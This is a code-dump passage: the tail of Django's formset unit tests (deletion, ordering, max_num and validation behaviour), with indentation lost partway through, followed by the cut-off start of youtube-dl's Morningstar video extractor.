<li>Choice: <input type="text" name="choices-1-choice" value="Fergie" /></li>
<li>Votes: <input type="number" name="choices-1-votes" value="900" /></li>
<li>Delete: <input type="checkbox" name="choices-1-DELETE" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>
<li>Delete: <input type="checkbox" name="choices-2-DELETE" /></li>""")

    # To delete something, we just need to set that form's special delete field to
    # 'on'. Let's go ahead and delete Fergie.
    data = {
        'choices-TOTAL_FORMS': '3',  # the number of forms rendered
        'choices-INITIAL_FORMS': '2',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': 'Calexico',
        'choices-0-votes': '100',
        'choices-0-DELETE': '',
        'choices-1-choice': 'Fergie',
        'choices-1-votes': '900',
        'choices-1-DELETE': 'on',
        'choices-2-choice': '',
        'choices-2-votes': '',
        'choices-2-DELETE': '',
    }

    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertTrue(formset.is_valid())
    self.assertEqual([form.cleaned_data for form in formset.forms], [{'votes': 100, 'DELETE': False, 'choice': 'Calexico'}, {'votes': 900, 'DELETE': True, 'choice': 'Fergie'}, {}])
    self.assertEqual([form.cleaned_data for form in formset.deleted_forms], [{'votes': 900, 'DELETE': True, 'choice': 'Fergie'}])

    # If we fill a form with something and then we check the can_delete checkbox for
    # that form, that form's errors should not make the entire formset invalid since
    # it's going to be deleted.
    class CheckForm(Form):
        field = IntegerField(min_value=100)

    data = {
        'check-TOTAL_FORMS': '3',  # the number of forms rendered
        'check-INITIAL_FORMS': '2',  # the number of forms with initial data
        'check-MAX_NUM_FORMS': '0',  # max number of forms
        'check-0-field': '200',
        'check-0-DELETE': '',
        'check-1-field': '50',
        'check-1-DELETE': 'on',
        'check-2-field': '',
        'check-2-DELETE': '',
    }
    CheckFormSet = formset_factory(CheckForm, can_delete=True)
    formset = CheckFormSet(data, prefix='check')
    self.assertTrue(formset.is_valid())

    # If we remove the deletion flag now we will have our validation back.
    data['check-1-DELETE'] = ''
    formset = CheckFormSet(data, prefix='check')
    self.assertFalse(formset.is_valid())

    # Should be able to get deleted_forms from a valid formset even if a
    # deleted form would have been invalid.
    class Person(Form):
        name = CharField()

    PeopleForm = formset_factory(
        form=Person,
        can_delete=True)

    p = PeopleForm(
        {'form-0-name': '', 'form-0-DELETE': 'on',  # no name!
         'form-TOTAL_FORMS': 1, 'form-INITIAL_FORMS': 1,
         'form-MAX_NUM_FORMS': 1})

    self.assertTrue(p.is_valid())
    self.assertEqual(len(p.deleted_forms), 1)
def test_formsets_with_ordering(self):
    """can_order adds an ORDER field; ordered_forms sorts by it."""
    # FormSets with ordering ######################################################
    # We can also add ordering ability to a FormSet with an argument to
    # formset_factory. This will add a integer field to each form instance. When
    # form validation succeeds, [form.cleaned_data for form in formset.forms] will have the data in the correct
    # order specified by the ordering fields. If a number is duplicated in the set
    # of ordering fields, for instance form 0 and form 3 are both marked as 1, then
    # the form index used as a secondary ordering criteria. In order to put
    # something at the front of the list, you'd need to set it's order to 0.
    ChoiceFormSet = formset_factory(Choice, can_order=True)

    initial = [{'choice': 'Calexico', 'votes': 100}, {'choice': 'Fergie', 'votes': 900}]
    formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
    form_output = []

    for form in formset.forms:
        form_output.append(form.as_ul())

    self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Order: <input type="number" name="choices-0-ORDER" value="1" /></li>
<li>Choice: <input type="text" name="choices-1-choice" value="Fergie" /></li>
<li>Votes: <input type="number" name="choices-1-votes" value="900" /></li>
<li>Order: <input type="number" name="choices-1-ORDER" value="2" /></li>
<li>Choice: <input type="text" name="choices-2-choice" /></li>
<li>Votes: <input type="number" name="choices-2-votes" /></li>
<li>Order: <input type="number" name="choices-2-ORDER" /></li>""")

    data = {
        'choices-TOTAL_FORMS': '3',  # the number of forms rendered
        'choices-INITIAL_FORMS': '2',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': 'Calexico',
        'choices-0-votes': '100',
        'choices-0-ORDER': '1',
        'choices-1-choice': 'Fergie',
        'choices-1-votes': '900',
        'choices-1-ORDER': '2',
        'choices-2-choice': 'The Decemberists',
        'choices-2-votes': '500',
        'choices-2-ORDER': '0',
    }

    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertTrue(formset.is_valid())
    form_output = []

    for form in formset.ordered_forms:
        form_output.append(form.cleaned_data)

    self.assertEqual(form_output, [
        {'votes': 500, 'ORDER': 0, 'choice': 'The Decemberists'},
        {'votes': 100, 'ORDER': 1, 'choice': 'Calexico'},
        {'votes': 900, 'ORDER': 2, 'choice': 'Fergie'},
    ])

def test_empty_ordered_fields(self):
    """Forms with a blank ORDER value sort after all explicitly ordered forms."""
    # Ordering fields are allowed to be left blank, and if they *are* left blank,
    # they will be sorted below everything else.
    data = {
        'choices-TOTAL_FORMS': '4',  # the number of forms rendered
        'choices-INITIAL_FORMS': '3',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': 'Calexico',
        'choices-0-votes': '100',
        'choices-0-ORDER': '1',
        'choices-1-choice': 'Fergie',
        'choices-1-votes': '900',
        'choices-1-ORDER': '2',
        'choices-2-choice': 'The Decemberists',
        'choices-2-votes': '500',
        'choices-2-ORDER': '',
        'choices-3-choice': 'Basia Bulat',
        'choices-3-votes': '50',
        'choices-3-ORDER': '',
    }

    ChoiceFormSet = formset_factory(Choice, can_order=True)
    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertTrue(formset.is_valid())
    form_output = []

    for form in formset.ordered_forms:
        form_output.append(form.cleaned_data)

    self.assertEqual(form_output, [
        {'votes': 100, 'ORDER': 1, 'choice': 'Calexico'},
        {'votes': 900, 'ORDER': 2, 'choice': 'Fergie'},
        {'votes': 500, 'ORDER': None, 'choice': 'The Decemberists'},
        {'votes': 50, 'ORDER': None, 'choice': 'Basia Bulat'},
    ])

def test_ordering_blank_fieldsets(self):
    """ordered_forms is empty when the formset contains no forms."""
    # Ordering should work with blank fieldsets.
    data = {
        'choices-TOTAL_FORMS': '3',  # the number of forms rendered
        'choices-INITIAL_FORMS': '0',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
    }

    ChoiceFormSet = formset_factory(Choice, can_order=True)
    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertTrue(formset.is_valid())
    form_output = []

    for form in formset.ordered_forms:
        form_output.append(form.cleaned_data)

    self.assertEqual(form_output, [])
def test_formset_with_ordering_and_deletion(self):
    """can_order and can_delete combine: deleted forms drop out of ordered_forms."""
    # FormSets with ordering + deletion ###########################################
    # Let's try throwing ordering and deletion into the same form.
    ChoiceFormSet = formset_factory(Choice, can_order=True, can_delete=True)

    initial = [
        {'choice': 'Calexico', 'votes': 100},
        {'choice': 'Fergie', 'votes': 900},
        {'choice': 'The Decemberists', 'votes': 500},
    ]
    formset = ChoiceFormSet(initial=initial, auto_id=False, prefix='choices')
    form_output = []

    for form in formset.forms:
        form_output.append(form.as_ul())

    self.assertHTMLEqual('\n'.join(form_output), """<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>
<li>Order: <input type="number" name="choices-0-ORDER" value="1" /></li>
<li>Delete: <input type="checkbox" name="choices-0-DELETE" /></li>
<li>Choice: <input type="text" name="choices-1-choice" value="Fergie" /></li>
<li>Votes: <input type="number" name="choices-1-votes" value="900" /></li>
<li>Order: <input type="number" name="choices-1-ORDER" value="2" /></li>
<li>Delete: <input type="checkbox" name="choices-1-DELETE" /></li>
<li>Choice: <input type="text" name="choices-2-choice" value="The Decemberists" /></li>
<li>Votes: <input type="number" name="choices-2-votes" value="500" /></li>
<li>Order: <input type="number" name="choices-2-ORDER" value="3" /></li>
<li>Delete: <input type="checkbox" name="choices-2-DELETE" /></li>
<li>Choice: <input type="text" name="choices-3-choice" /></li>
<li>Votes: <input type="number" name="choices-3-votes" /></li>
<li>Order: <input type="number" name="choices-3-ORDER" /></li>
<li>Delete: <input type="checkbox" name="choices-3-DELETE" /></li>""")

    # Let's delete Fergie, and put The Decemberists ahead of Calexico.
    data = {
        'choices-TOTAL_FORMS': '4',  # the number of forms rendered
        'choices-INITIAL_FORMS': '3',  # the number of forms with initial data
        'choices-MAX_NUM_FORMS': '0',  # max number of forms
        'choices-0-choice': 'Calexico',
        'choices-0-votes': '100',
        'choices-0-ORDER': '1',
        'choices-0-DELETE': '',
        'choices-1-choice': 'Fergie',
        'choices-1-votes': '900',
        'choices-1-ORDER': '2',
        'choices-1-DELETE': 'on',
        'choices-2-choice': 'The Decemberists',
        'choices-2-votes': '500',
        'choices-2-ORDER': '0',
        'choices-2-DELETE': '',
        'choices-3-choice': '',
        'choices-3-votes': '',
        'choices-3-ORDER': '',
        'choices-3-DELETE': '',
    }

    formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
    self.assertTrue(formset.is_valid())
    form_output = []

    for form in formset.ordered_forms:
        form_output.append(form.cleaned_data)

    self.assertEqual(form_output, [
        {'votes': 500, 'DELETE': False, 'ORDER': 0, 'choice': 'The Decemberists'},
        {'votes': 100, 'DELETE': False, 'ORDER': 1, 'choice': 'Calexico'},
    ])
    self.assertEqual([form.cleaned_data for form in formset.deleted_forms], [{'votes': 900, 'DELETE': True, 'ORDER': 2, 'choice': 'Fergie'}])

def test_invalid_deleted_form_with_ordering(self):
    """ordered_forms is usable even when a deleted form would be invalid."""
    # Should be able to get ordered forms from a valid formset even if a
    # deleted form would have been invalid.
    class Person(Form):
        name = CharField()

    PeopleForm = formset_factory(form=Person, can_delete=True, can_order=True)

    p = PeopleForm({
        'form-0-name': '',
        'form-0-DELETE': 'on',  # no name!
        'form-TOTAL_FORMS': 1,
        'form-INITIAL_FORMS': 1,
        'form-MAX_NUM_FORMS': 1
    })

    self.assertTrue(p.is_valid())
    self.assertEqual(p.ordered_forms, [])

def test_clean_hook(self):
    """Formset-level clean() errors are reported via non_form_errors()."""
    # FormSet clean hook ##########################################################
    # FormSets have a hook for doing extra validation that shouldn't be tied to any
    # particular form. It follows the same pattern as the clean hook on Forms.
    # We start out with a some duplicate data.
    data = {
        'drinks-TOTAL_FORMS': '2',  # the number of forms rendered
        'drinks-INITIAL_FORMS': '0',  # the number of forms with initial data
        'drinks-MAX_NUM_FORMS': '0',  # max number of forms
        'drinks-0-name': 'Gin and Tonic',
        'drinks-1-name': 'Gin and Tonic',
    }

    formset = FavoriteDrinksFormSet(data, prefix='drinks')
    self.assertFalse(formset.is_valid())

    # Any errors raised by formset.clean() are available via the
    # formset.non_form_errors() method.
    for error in formset.non_form_errors():
        self.assertEqual(str(error), 'You may only specify a drink once.')

    # Make sure we didn't break the valid case.
    data = {
        'drinks-TOTAL_FORMS': '2',  # the number of forms rendered
        'drinks-INITIAL_FORMS': '0',  # the number of forms with initial data
        'drinks-MAX_NUM_FORMS': '0',  # max number of forms
        'drinks-0-name': 'Gin and Tonic',
        'drinks-1-name': 'Bloody Mary',
    }

    formset = FavoriteDrinksFormSet(data, prefix='drinks')
    self.assertTrue(formset.is_valid())
    self.assertEqual(formset.non_form_errors(), [])
def test_limiting_max_forms(self):
# Limiting the maximum number of forms ########################################
# Base case for max_num.
# When not passed, max_num will take a high default value, leaving the
# number of forms only controlled by the value of the extra parameter.
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=3)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>
<tr><th><label for="id_form-2-name">Name:</label></th><td><input type="text" name="form-2-name" id="id_form-2-name" /></td></tr>""")
# If max_num is 0 then no form is rendered at all.
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=3, max_num=0)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertEqual('\n'.join(form_output), "")
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=5, max_num=2)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>""")
# Ensure that max_num has no effect when extra is less than max_num.
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=2)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" id="id_form-0-name" /></td></tr>""")
def test_max_num_with_initial_data(self):
# max_num with initial data
# When not passed, max_num will take a high default value, leaving the
# number of forms only controlled by the value of the initial and extra
# parameters.
initial = [
{'name': 'Fernet and Coke'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" value="Fernet and Coke" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>""")
def test_max_num_zero(self):
# If max_num is 0 then no form is rendered at all, regardless of extra,
# unless initial data is present. (This changed in the patch for bug
# 20084 -- previously max_num=0 trumped initial data)
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=0)
formset = LimitedFavoriteDrinkFormSet()
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertEqual('\n'.join(form_output), "")
# test that initial trumps max_num
initial = [
{'name': 'Fernet and Coke'},
{'name': 'Bloody Mary'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=0)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input id="id_form-0-name" name="form-0-name" type="text" value="Fernet and Coke" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input id="id_form-1-name" name="form-1-name" type="text" value="Bloody Mary" /></td></tr>""")
def test_more_initial_than_max_num(self):
# More initial forms than max_num now results in all initial forms
# being displayed (but no extra forms). This behavior was changed
# from max_num taking precedence in the patch for #20084
initial = [
{'name': 'Gin Tonic'},
{'name': 'Bloody Mary'},
{'name': 'Jack and Coke'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=1, max_num=2)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input id="id_form-0-name" name="form-0-name" type="text" value="Gin Tonic" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input id="id_form-1-name" name="form-1-name" type="text" value="Bloody Mary" /></td></tr>
<tr><th><label for="id_form-2-name">Name:</label></th><td><input id="id_form-2-name" name="form-2-name" type="text" value="Jack and Coke" /></td></tr>""")
# One form from initial and extra=3 with max_num=2 should result in the one
# initial form and one extra.
initial = [
{'name': 'Gin Tonic'},
]
LimitedFavoriteDrinkFormSet = formset_factory(FavoriteDrinkForm, extra=3, max_num=2)
formset = LimitedFavoriteDrinkFormSet(initial=initial)
form_output = []
for form in formset.forms:
form_output.append(str(form))
self.assertHTMLEqual('\n'.join(form_output), """<tr><th><label for="id_form-0-name">Name:</label></th><td><input type="text" name="form-0-name" value="Gin Tonic" id="id_form-0-name" /></td></tr>
<tr><th><label for="id_form-1-name">Name:</label></th><td><input type="text" name="form-1-name" id="id_form-1-name" /></td></tr>""")
def test_regression_6926(self):
# Regression test for #6926 ##################################################
# Make sure the management form has the correct prefix.
formset = FavoriteDrinksFormSet()
self.assertEqual(formset.management_form.prefix, 'form')
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
}
formset = FavoriteDrinksFormSet(data=data)
self.assertEqual(formset.management_form.prefix, 'form')
formset = FavoriteDrinksFormSet(initial={})
self.assertEqual(formset.management_form.prefix, 'form')
def test_regression_12878(self):
# Regression test for #12878 #################################################
data = {
'drinks-TOTAL_FORMS': '2', # the number of forms rendered
'drinks-INITIAL_FORMS': '0', # the number of forms with initial data
'drinks-MAX_NUM_FORMS': '0', # max number of forms
'drinks-0-name': 'Gin and Tonic',
'drinks-1-name': 'Gin and Tonic',
}
formset = FavoriteDrinksFormSet(data, prefix='drinks')
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(), ['You may only specify a drink once.'])
def test_formset_iteration(self):
# Regression tests for #16455 -- formset instances are iterable
ChoiceFormset = formset_factory(Choice, extra=3)
formset = ChoiceFormset()
# confirm iterated formset yields formset.forms
forms = list(formset)
self.assertEqual(forms, formset.forms)
self.assertEqual(len(formset), len(forms))
# confirm indexing of formset
self.assertEqual(formset[0], forms[0])
try:
formset[3]
self.fail('Requesting an invalid formset index should raise an exception')
except IndexError:
pass
# Formets can override the default iteration order
class BaseReverseFormSet(BaseFormSet):
def __iter__(self):
return reversed(self.forms)
def __getitem__(self, idx):
return super(BaseReverseFormSet, self).__getitem__(len(self) - idx - 1)
ReverseChoiceFormset = formset_factory(Choice, BaseReverseFormSet, extra=3)
reverse_formset = ReverseChoiceFormset()
# confirm that __iter__ modifies rendering order
# compare forms from "reverse" formset with forms from original formset
self.assertEqual(str(reverse_formset[0]), str(forms[-1]))
self.assertEqual(str(reverse_formset[1]), str(forms[-2]))
self.assertEqual(len(reverse_formset), len(forms))
def test_formset_nonzero(self):
"""
Formsets with no forms should still evaluate as true.
Regression test for #15722
"""
ChoiceFormset = formset_factory(Choice, extra=0)
formset = ChoiceFormset()
self.assertEqual(len(formset.forms), 0)
self.assertTrue(formset)
def test_formset_splitdatetimefield(self):
"""
Formset should also work with SplitDateTimeField(initial=datetime.datetime.now).
Regression test for #18709.
"""
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-0-when_0': '1904-06-16',
'form-0-when_1': '15:51:33',
}
formset = SplitDateTimeFormSet(data)
self.assertTrue(formset.is_valid())
def test_formset_error_class(self):
# Regression tests for #16479 -- formsets form use ErrorList instead of supplied error_class
class CustomErrorList(ErrorList):
pass
formset = FavoriteDrinksFormSet(error_class=CustomErrorList)
self.assertEqual(formset.forms[0].error_class, CustomErrorList)
def test_formset_calls_forms_is_valid(self):
# Regression tests for #18574 -- make sure formsets call
# is_valid() on each form.
class AnotherChoice(Choice):
def is_valid(self):
self.is_valid_called = True
return super(AnotherChoice, self).is_valid()
AnotherChoiceFormSet = formset_factory(AnotherChoice)
data = {
'choices-TOTAL_FORMS': '1', # number of forms rendered
'choices-INITIAL_FORMS': '0', # number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
}
formset = AnotherChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertTrue(formset.is_valid())
self.assertTrue(all([form.is_valid_called for form in formset.forms]))
def test_hard_limit_on_instantiated_forms(self):
"""A formset has a hard limit on the number of forms instantiated."""
# reduce the default limit of 1000 temporarily for testing
_old_DEFAULT_MAX_NUM = formsets.DEFAULT_MAX_NUM
try:
formsets.DEFAULT_MAX_NUM = 2
ChoiceFormSet = formset_factory(Choice, max_num=1)
# someone fiddles with the mgmt form data...
formset = ChoiceFormSet(
{
'choices-TOTAL_FORMS': '4',
'choices-INITIAL_FORMS': '0',
'choices-MAX_NUM_FORMS': '4',
'choices-0-choice': 'Zero',
'choices-0-votes': '0',
'choices-1-choice': 'One',
'choices-1-votes': '1',
'choices-2-choice': 'Two',
'choices-2-votes': '2',
'choices-3-choice': 'Three',
'choices-3-votes': '3',
},
prefix='choices',
)
# But we still only instantiate 3 forms
self.assertEqual(len(formset.forms), 3)
# and the formset isn't valid
self.assertFalse(formset.is_valid())
finally:
formsets.DEFAULT_MAX_NUM = _old_DEFAULT_MAX_NUM
def test_increase_hard_limit(self):
"""Can increase the built-in forms limit via a higher max_num."""
# reduce the default limit of 1000 temporarily for testing
_old_DEFAULT_MAX_NUM = formsets.DEFAULT_MAX_NUM
try:
formsets.DEFAULT_MAX_NUM = 3
# for this form, we want a limit of 4
ChoiceFormSet = formset_factory(Choice, max_num=4)
formset = ChoiceFormSet(
{
'choices-TOTAL_FORMS': '4',
'choices-INITIAL_FORMS': '0',
'choices-MAX_NUM_FORMS': '4',
'choices-0-choice': 'Zero',
'choices-0-votes': '0',
'choices-1-choice': 'One',
'choices-1-votes': '1',
'choices-2-choice': 'Two',
'choices-2-votes': '2',
'choices-3-choice': 'Three',
'choices-3-votes': '3',
},
prefix='choices',
)
# Four forms are instantiated and no exception is raised
self.assertEqual(len(formset.forms), 4)
finally:
formsets.DEFAULT_MAX_NUM = _old_DEFAULT_MAX_NUM
def test_non_form_errors_run_full_clean(self):
# Regression test for #11160
# If non_form_errors() is called without calling is_valid() first,
# it should ensure that full_clean() is called.
class BaseCustomFormSet(BaseFormSet):
def clean(self):
raise ValidationError("This is a non-form error")
ChoiceFormSet = formset_factory(Choice, formset=BaseCustomFormSet)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertIsInstance(formset.non_form_errors(), ErrorList)
self.assertEqual(list(formset.non_form_errors()),
['This is a non-form error'])
def test_validate_max_ignores_forms_marked_for_deletion(self):
class CheckForm(Form):
field = IntegerField()
data = {
'check-TOTAL_FORMS': '2',
'check-INITIAL_FORMS': '0',
'check-MAX_NUM_FORMS': '1',
'check-0-field': '200',
'check-0-DELETE': '',
'check-1-field': '50',
'check-1-DELETE': 'on',
}
CheckFormSet = formset_factory(CheckForm, max_num=1, validate_max=True,
can_delete=True)
formset = CheckFormSet(data, prefix='check')
self.assertTrue(formset.is_valid())
def test_formset_total_error_count(self):
"""A valid formset should have 0 total errors."""
data = [ # formset_data, expected error count
([('Calexico', '100')], 0),
([('Calexico', '')], 1),
([('', 'invalid')], 2),
([('Calexico', '100'), ('Calexico', '')], 1),
([('Calexico', ''), ('Calexico', '')], 2),
]
for formset_data, expected_error_count in data:
formset = self.make_choiceformset(formset_data)
self.assertEqual(formset.total_error_count(), expected_error_count)
def test_formset_total_error_count_with_non_form_errors(self):
data = {
'choices-TOTAL_FORMS': '2', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '2', # max number of forms - should be ignored
'choices-0-choice': 'Zero',
'choices-0-votes': '0',
'choices-1-choice': 'One',
'choices-1-votes': '1',
}
ChoiceFormSet = formset_factory(Choice, extra=1, max_num=1, validate_max=True)
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertEqual(formset.total_error_count(), 1)
data['choices-1-votes'] = ''
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertEqual(formset.total_error_count(), 2)
data = {
'choices-TOTAL_FORMS': '1', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
}
class Choice(Form):
choice = CharField()
votes = IntegerField()
ChoiceFormSet = formset_factory(Choice)
class FormsetAsFooTests(TestCase):
def test_as_table(self):
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertHTMLEqual(formset.as_table(),"""<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="0" />
<tr><th>Choice:</th><td><input type="text" name="choices-0-choice" value="Calexico" /></td></tr>
<tr><th>Votes:</th><td><input type="number" name="choices-0-votes" value="100" /></td></tr>""")
def test_as_p(self):
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertHTMLEqual(formset.as_p(),"""<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="0" />
<p>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></p>
<p>Votes: <input type="number" name="choices-0-votes" value="100" /></p>""")
def test_as_ul(self):
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertHTMLEqual(formset.as_ul(),"""<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="0" />
<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>""")
# Regression test for #11418 #################################################
class ArticleForm(Form):
title = CharField()
pub_date = DateField()
ArticleFormSet = formset_factory(ArticleForm)
class TestIsBoundBehavior(TestCase):
def test_no_data_raises_validation_error(self):
with self.assertRaises(ValidationError):
ArticleFormSet({}).is_valid()
def test_with_management_data_attrs_work_fine(self):
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
}
formset = ArticleFormSet(data)
self.assertEqual(0, formset.initial_form_count())
self.assertEqual(1, formset.total_form_count())
self.assertTrue(formset.is_bound)
self.assertTrue(formset.forms[0].is_bound)
self.assertTrue(formset.is_valid())
self.assertTrue(formset.forms[0].is_valid())
self.assertEqual([{}], formset.cleaned_data)
def test_form_errors_are_caught_by_formset(self):
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-0-title': 'Test',
'form-0-pub_date': '1904-06-16',
'form-1-title': 'Test',
'form-1-pub_date': '', # <-- this date is missing but required
}
formset = ArticleFormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual([{}, {'pub_date': ['This field is required.']}], formset.errors)
def test_empty_forms_are_unbound(self):
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-0-title': 'Test',
'form-0-pub_date': '1904-06-16',
}
unbound_formset = ArticleFormSet()
bound_formset = ArticleFormSet(data)
empty_forms = []
empty_forms.append(unbound_formset.empty_form)
empty_forms.append(bound_formset.empty_form)
# Empty forms should be unbound
self.assertFalse(empty_forms[0].is_bound)
self.assertFalse(empty_forms[1].is_bound)
# The empty forms should be equal.
self.assertHTMLEqual(empty_forms[0].as_p(), empty_forms[1].as_p())
class TestEmptyFormSet(TestCase):
def test_empty_formset_is_valid(self):
"""Test that an empty formset still calls clean()"""
EmptyFsetWontValidateFormset = formset_factory(FavoriteDrinkForm, extra=0, formset=EmptyFsetWontValidate)
formset = EmptyFsetWontValidateFormset(data={'form-INITIAL_FORMS':'0', 'form-TOTAL_FORMS':'0'},prefix="form")
formset2 = EmptyFsetWontValidateFormset(data={'form-INITIAL_FORMS':'0', 'form-TOTAL_FORMS':'1', 'form-0-name':'bah' },prefix="form")
self.assertFalse(formset.is_valid())
self.assertFalse(formset2.is_valid())
def test_empty_formset_media(self):
"""Make sure media is available on empty formset, refs #19545"""
class MediaForm(Form):
class Media:
js = ('some-file.js',)
self.assertIn('some-file.js', str(formset_factory(MediaForm, extra=0)().media))
def test_empty_formset_is_multipart(self):
"""Make sure `is_multipart()` works with empty formset, refs #19545"""
class FileForm(Form):
file = FileField()
self.assertTrue(formset_factory(FileForm, extra=0)().is_multipart())
| gpl-3.0 |
steebchen/youtube-dl | youtube_dl/extractor/morningstar.py | 33 | 1862 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class MorningstarIE(InfoExtractor):
IE_DESC = 'morningstar.com'
_VALID_URL = r'https?://(?:(?:www|news)\.)morningstar\.com/[cC]over/video[cC]enter\.aspx\?id=(?P<id>[0-9]+)'
_TESTS = [{
'url': 'http://www.morningstar.com/cover/videocenter.aspx?id=615869',
'md5': '6c0acface7a787aadc8391e4bbf7b0f5',
'info_dict': {
'id': '615869',
'ext': 'mp4',
'title': 'Get Ahead of the Curve on 2013 Taxes',
'description': "Vanguard's Joel Dickson on managing higher tax rates for high-income earners and fund capital-gain distributions in 2013.",
'thumbnail': r're:^https?://.*m(?:orning)?star\.com/.+thumb\.jpg$'
}
}, {
'url': 'http://news.morningstar.com/cover/videocenter.aspx?id=825556',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(
r'<h1 id="titleLink">(.*?)</h1>', webpage, 'title')
video_url = self._html_search_regex(
r'<input type="hidden" id="hidVideoUrl" value="([^"]+)"',
webpage, 'video URL')
thumbnail = self._html_search_regex(
r'<input type="hidden" id="hidSnapshot" value="([^"]+)"',
webpage, 'thumbnail', fatal=False)
description = self._html_search_regex(
r'<div id="mstarDeck".*?>(.*?)</div>',
webpage, 'description', fatal=False)
return {
'id': video_id,
'title': title,
'url': video_url,
'thumbnail': thumbnail,
